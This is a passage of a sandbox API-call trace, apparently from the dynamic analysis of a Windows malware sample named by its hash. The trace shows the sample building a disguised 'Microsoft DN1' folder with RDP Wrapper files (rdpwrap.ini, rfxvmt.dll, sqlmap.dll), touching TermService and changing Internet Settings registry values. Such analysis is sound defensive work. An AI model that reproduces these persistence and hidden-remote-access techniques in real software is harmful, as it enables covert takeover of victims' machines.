(lpString1="DlgDirListComboBoxA", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DlgDirListComboBoxW", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DlgDirListW", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DlgDirSelectComboBoxExA", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DlgDirSelectComboBoxExW", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DlgDirSelectExA", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DlgDirSelectExW", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DoSoundConnect", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DoSoundDisconnect", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DragDetect", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DragObject", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawAnimatedRects", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawCaption", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawCaptionTempA", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawCaptionTempW", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawEdge", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawFocusRect", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawFrame", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawFrameControl", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawIcon", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawIconEx", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawMenuBar", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawMenuBarTemp", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawStateA", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawStateW", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawTextA", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawTextExA", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawTextExW", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DrawTextW", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DwmGetDxSharedSurface", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DwmGetRemoteSessionOcclusionEvent", lpString2="GetRawInputData") returned -1 [0131.577] lstrcmpA (lpString1="DwmGetRemoteSessionOcclusionState", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="DwmKernelShutdown", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="DwmKernelStartup", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="DwmLockScreenUpdates", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="DwmValidateWindow", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EditWndProc", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EmptyClipboard", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnableChildWindowDpiMessage", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnableMenuItem", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnableMouseInPointer", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnableScrollBar", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnableSessionForMMCSS", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnableWindow", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EndDeferWindowPos", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EndDeferWindowPosEx", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EndDialog", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EndMenu", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EndPaint", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EndTask", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnterReaderModeHelper", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnumChildWindows", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnumClipboardFormats", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnumDesktopWindows", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnumDesktopsA", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnumDesktopsW", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnumDisplayDevicesA", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnumDisplayDevicesW", lpString2="GetRawInputData") returned -1 [0131.578] lstrcmpA (lpString1="EnumDisplayMonitors", lpString2="GetRawInputData") returned -1 [0131.579] lstrcmpA (lpString1="EnumDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0131.579] lstrcmpA (lpString1="EnumDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0131.579] lstrcmpA (lpString1="EnumDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0131.579] GetProcessHeap () returned 0x7c0000 [0131.579] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x18) returned 0x7dba08 [0131.579] lstrlenW (lpString="TermService") returned 11 [0131.579] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3180000 [0131.580] lstrlenW (lpString="TermService") returned 11 [0131.580] lstrcpyW (in: lpString1=0x3180000, lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0131.580] lstrlenW (lpString="TermService") returned 11 [0131.580] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0131.580] lstrcatW (in: lpString1="", lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0131.580] VirtualFree (lpAddress=0x3180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.581] lstrlenW (lpString="%ProgramFiles%") returned 14 [0131.581] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3180000 [0131.581] lstrlenW (lpString="%ProgramFiles%") returned 14 [0131.581] lstrcpyW (in: lpString1=0x3180000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0131.581] lstrlenW (lpString="%ProgramFiles%") returned 14 [0131.581] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x31a0000 [0131.581] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0131.582] VirtualFree (lpAddress=0x3180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.582] lstrlenW (lpString="%windir%\\System32") returned 17 [0131.582] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3180000 [0131.582] lstrlenW (lpString="%windir%\\System32") returned 17 [0131.582] lstrcpyW (in: lpString1=0x3180000, lpString2="%windir%\\System32" | out: lpString1="%windir%\\System32") returned="%windir%\\System32" [0131.582] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32", lpDst=0x2dafb00, nSize=0x1ff | out: lpDst="C:\\Windows\\System32") returned 0x14 [0131.583] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0131.583] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x31b0000 [0131.583] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0131.583] lstrcpyW (in: lpString1=0x31b0000, lpString2="C:\\Windows\\System32" | out: lpString1="C:\\Windows\\System32") returned="C:\\Windows\\System32" [0131.583] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0131.583] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x31c0000 [0131.583] lstrcpyW (in: lpString1=0x31c0000, lpString2="C:\\Windows\\System32" | out: lpString1="C:\\Windows\\System32") returned="C:\\Windows\\System32" [0131.583] VirtualFree (lpAddress=0x31b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.584] VirtualFree (lpAddress=0x3180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.584] GetCurrentProcess () returned 0xffffffff [0131.584] GetModuleHandleA (lpModuleName="kernel32") returned 0x74580000 [0131.585] GetProcAddress (hModule=0x74580000, lpProcName="IsWow64Process") returned 0x74599f10 [0131.585] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2dafef0 | out: Wow64Process=0x2dafef0*=1) returned 1 [0131.585] VirtualFree (lpAddress=0x31a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.585] lstrlenW (lpString="%ProgramW6432%") returned 14 [0131.585] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3180000 [0131.585] lstrlenW (lpString="%ProgramW6432%") returned 14 [0131.586] lstrcpyW (in: lpString1=0x3180000, lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0131.586] lstrlenW (lpString="%ProgramW6432%") returned 14 [0131.586] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x31a0000 [0131.586] lstrcatW (in: lpString1="", lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0131.586] VirtualFree (lpAddress=0x3180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.587] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x2dafb00, nSize=0x1ff | out: lpDst="C:\\Program Files") returned 0x11 [0131.587] lstrlenW (lpString="C:\\Program Files") returned 16 [0131.587] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x3180000 [0131.587] lstrlenW (lpString="C:\\Program Files") returned 16 [0131.587] lstrcpyW (in: lpString1=0x3180000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0131.587] lstrlenW (lpString="C:\\Program Files") returned 16 [0131.587] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x31b0000 [0131.587] lstrcpyW (in: lpString1=0x31b0000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0131.587] VirtualFree (lpAddress=0x3180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.588] VirtualFree (lpAddress=0x31a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.588] lstrlenW (lpString="%ProgramFiles%") returned 14 [0131.588] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3180000 [0131.589] lstrlenW (lpString="%ProgramFiles%") returned 14 [0131.589] lstrcpyW (in: lpString1=0x3180000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0131.589] lstrlenW (lpString="%ProgramFiles%") returned 14 [0131.589] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x31a0000 [0131.589] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0131.589] VirtualFree (lpAddress=0x3180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.589] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0131.589] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3180000 [0131.590] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0131.590] lstrcpyW (in: lpString1=0x3180000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0131.590] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0131.590] lstrlenW (lpString="C:\\Program Files") returned 16 [0131.590] VirtualQuery (in: lpAddress=0x31b0000, lpBuffer=0x2dafea4, dwLength=0x1c | out: lpBuffer=0x2dafea4*(BaseAddress=0x31b0000, AllocationBase=0x31b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.590] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x31d0000 [0131.590] VirtualFree (lpAddress=0x31b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.591] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0131.591] VirtualFree (lpAddress=0x3180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.591] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0131.591] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3180000 [0131.591] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0131.591] lstrcpyW (in: lpString1=0x3180000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0131.592] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0131.592] lstrlenW (lpString="%ProgramFiles%") returned 14 [0131.592] VirtualQuery (in: lpAddress=0x31a0000, lpBuffer=0x2dafea4, dwLength=0x1c | out: lpBuffer=0x2dafea4*(BaseAddress=0x31a0000, AllocationBase=0x31a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.592] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0x31b0000 [0131.592] VirtualFree (lpAddress=0x31a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.592] lstrcatW (in: lpString1="%ProgramFiles%", lpString2="\\Microsoft DN1" | out: lpString1="%ProgramFiles%\\Microsoft DN1") returned="%ProgramFiles%\\Microsoft DN1" [0131.592] VirtualFree (lpAddress=0x3180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.593] lstrlenW (lpString="\\rfxvmt.dll") returned 11 [0131.593] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3180000 [0131.593] lstrlenW (lpString="\\rfxvmt.dll") returned 11 [0131.593] lstrcpyW (in: lpString1=0x3180000, lpString2="\\rfxvmt.dll" | out: lpString1="\\rfxvmt.dll") returned="\\rfxvmt.dll" [0131.593] lstrlenW (lpString="\\rfxvmt.dll") returned 11 [0131.593] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0131.593] VirtualQuery (in: lpAddress=0x31c0000, lpBuffer=0x2dafea4, dwLength=0x1c | out: lpBuffer=0x2dafea4*(BaseAddress=0x31c0000, AllocationBase=0x31c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.593] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x31a0000 [0131.594] VirtualFree (lpAddress=0x31c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.594] lstrcatW (in: lpString1="C:\\Windows\\System32", lpString2="\\rfxvmt.dll" | out: lpString1="C:\\Windows\\System32\\rfxvmt.dll") returned="C:\\Windows\\System32\\rfxvmt.dll" [0131.594] VirtualFree (lpAddress=0x3180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.595] SHCreateDirectoryExW (hwnd=0x0, pszPath="C:\\Program Files\\Microsoft DN1" (normalized: "c:\\program files\\microsoft dn1"), psa=0x0) returned 0 [0131.622] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0131.623] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x31c0000 [0131.623] lstrcpyW (in: lpString1=0x31c0000, lpString2="C:\\Program Files\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0131.623] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0131.623] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x31e0000 [0131.624] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0131.624] lstrcpyW (in: lpString1=0x31e0000, lpString2="\\rdpwrap.ini" | out: lpString1="\\rdpwrap.ini") returned="\\rdpwrap.ini" [0131.624] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0131.624] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0131.624] VirtualQuery (in: lpAddress=0x31c0000, lpBuffer=0x2dafea4, dwLength=0x1c | out: lpBuffer=0x2dafea4*(BaseAddress=0x31c0000, AllocationBase=0x31c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.624] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x31f0000 [0131.624] VirtualFree (lpAddress=0x31c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.625] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\rdpwrap.ini" | out: lpString1="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini" [0131.625] VirtualFree (lpAddress=0x31e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.626] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0131.626] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x31c0000 [0131.626] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0131.626] lstrcpyW (in: lpString1=0x31c0000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0131.626] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0131.626] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0131.626] VirtualQuery (in: lpAddress=0x31d0000, lpBuffer=0x2dafea4, dwLength=0x1c | out: lpBuffer=0x2dafea4*(BaseAddress=0x31d0000, AllocationBase=0x31d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.626] VirtualAlloc (lpAddress=0x0, dwSize=0x56, flAllocationType=0x3000, flProtect=0x4) returned 0x31e0000 [0131.626] VirtualFree (lpAddress=0x31d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.627] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned="C:\\Program Files\\Microsoft DN1\\sqlmap.dll" [0131.627] VirtualFree (lpAddress=0x31c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.628] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0131.628] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x31c0000 [0131.628] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0131.628] lstrcpyW (in: lpString1=0x31c0000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0131.628] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0131.628] lstrlenW (lpString="%ProgramFiles%\\Microsoft DN1") returned 28 [0131.628] VirtualQuery (in: lpAddress=0x31b0000, lpBuffer=0x2dafea4, dwLength=0x1c | out: lpBuffer=0x2dafea4*(BaseAddress=0x31b0000, AllocationBase=0x31b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.628] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x31d0000 [0131.628] VirtualFree (lpAddress=0x31b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.629] lstrcatW (in: lpString1="%ProgramFiles%\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll") returned="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll" [0131.629] VirtualFree (lpAddress=0x31c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.630] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x31b0000 [0131.630] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x28c [0131.630] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x2c9dba4 | out: lpWSAData=0x2c9dba4) returned 0 [0131.638] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x31c0000 [0131.638] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x2a8 [0131.638] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x2c9dd84 | out: lpWSAData=0x2c9dd84) returned 0 [0131.638] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x2ac [0131.639] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0131.640] GetTickCount () returned 0x151f248 [0131.640] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2daf9d0, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe")) returned 0x62 [0131.640] GetProcessHeap () returned 0x7c0000 [0131.641] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x400000) returned 0x320c020 [0131.659] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b0 [0131.659] GetFileSize (in: hFile=0x2b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x36600 [0131.663] ReadFile (in: hFile=0x2b0, lpBuffer=0x320c020, nNumberOfBytesToRead=0x36600, lpNumberOfBytesRead=0x2daf8c4, lpOverlapped=0x0 | out: lpBuffer=0x320c020*, lpNumberOfBytesRead=0x2daf8c4*=0x36600, lpOverlapped=0x0) returned 1 [0131.666] CloseHandle (hObject=0x2b0) returned 1 [0131.667] GetProcessHeap () returned 0x7c0000 [0131.667] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x20) returned 0x7e1688 [0131.667] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="ñ\x0e\x965") returned 0x2b0 [0131.667] GetLastError () returned 0x0 [0131.667] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x2daf8e0, lpdwDisposition=0x2daf8f4 | out: phkResult=0x2daf8e0*=0x2b4, lpdwDisposition=0x2daf8f4*=0x2) returned 0x0 [0131.667] RegSetValueExA (in: hKey=0x2b4, lpValueName="MaxConnectionsPer1_0Server", Reserved=0x0, dwType=0x4, lpData=0x2daf8ec*=0xa, cbData=0x4 | out: lpData=0x2daf8ec*=0xa) returned 0x0 [0131.668] RegSetValueExA (in: hKey=0x2b4, lpValueName="MaxConnectionsPerServer", Reserved=0x0, dwType=0x4, lpData=0x2daf8ec*=0xa, cbData=0x4 | out: lpData=0x2daf8ec*=0xa) returned 0x0 [0131.668] RegCloseKey (hKey=0x2b4) returned 0x0 [0131.668] Sleep (dwMilliseconds=0x1f4) [0132.191] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x2b4 [0132.192] GetProcessHeap () returned 0x7c0000 [0132.192] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0xf4) returned 0x7fbe08 [0132.192] GetProcessHeap () returned 0x7c0000 [0132.192] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x400) returned 0x7fbf08 [0132.192] GetProcessHeap () returned 0x7c0000 [0132.192] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x13000) returned 0x7fc310 [0132.194] GetProcessHeap () returned 0x7c0000 [0132.194] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x13000) returned 0x80f318 [0132.196] GetProcessHeap () returned 0x7c0000 [0132.199] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7fc310 | out: hHeap=0x7c0000) returned 1 [0132.200] GetProcessHeap () returned 0x7c0000 [0132.200] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4a00) returned 0x7e7620 [0132.203] GetProcessHeap () returned 0x7c0000 [0132.203] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4a00) returned 0x7ec028 [0132.203] GetProcessHeap () returned 0x7c0000 [0132.204] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7620 | out: hHeap=0x7c0000) returned 1 [0132.204] GetProcessHeap () returned 0x7c0000 [0132.204] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x600) returned 0x7f0a30 [0132.204] GetProcessHeap () returned 0x7c0000 [0132.204] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x600) returned 0x7f1038 [0132.204] GetProcessHeap () returned 0x7c0000 [0132.205] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f0a30 | out: hHeap=0x7c0000) returned 1 [0132.205] GetProcessHeap () returned 0x7c0000 [0132.205] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x2e00) returned 0x822320 [0132.205] GetProcessHeap () returned 0x7c0000 [0132.205] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x2e00) returned 0x7e7620 [0132.205] GetProcessHeap () returned 0x7c0000 [0132.205] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x822320 | out: hHeap=0x7c0000) returned 1 [0132.205] GetProcessHeap () returned 0x7c0000 [0132.205] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1000) returned 0x7ea428 [0132.205] GetProcessHeap () returned 0x7c0000 [0132.205] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1000) returned 0x7f1640 [0132.206] GetProcessHeap () returned 0x7c0000 [0132.206] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7ea428 | out: hHeap=0x7c0000) returned 1 [0132.206] GetProcessHeap () returned 0x7c0000 [0132.206] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x7f0a30 [0132.206] GetProcessHeap () returned 0x7c0000 [0132.206] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x5a4) returned 0x7f2648 [0132.206] GetProcessHeap () returned 0x7c0000 [0132.206] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x13000) returned 0x7fc310 [0132.206] GetProcessHeap () returned 0x7c0000 [0132.206] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4a00) returned 0x822320 [0132.207] GetProcessHeap () returned 0x7c0000 [0132.207] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x600) returned 0x7f2bf8 [0132.207] GetProcessHeap () returned 0x7c0000 [0132.207] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x2e00) returned 0x826d28 [0132.207] GetProcessHeap () returned 0x7c0000 [0132.207] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1000) returned 0x829b30 [0132.207] GetProcessHeap () returned 0x7c0000 [0132.207] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f1640 | out: hHeap=0x7c0000) returned 1 [0132.207] GetProcessHeap () returned 0x7c0000 [0132.208] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7620 | out: hHeap=0x7c0000) returned 1 [0132.208] GetProcessHeap () returned 0x7c0000 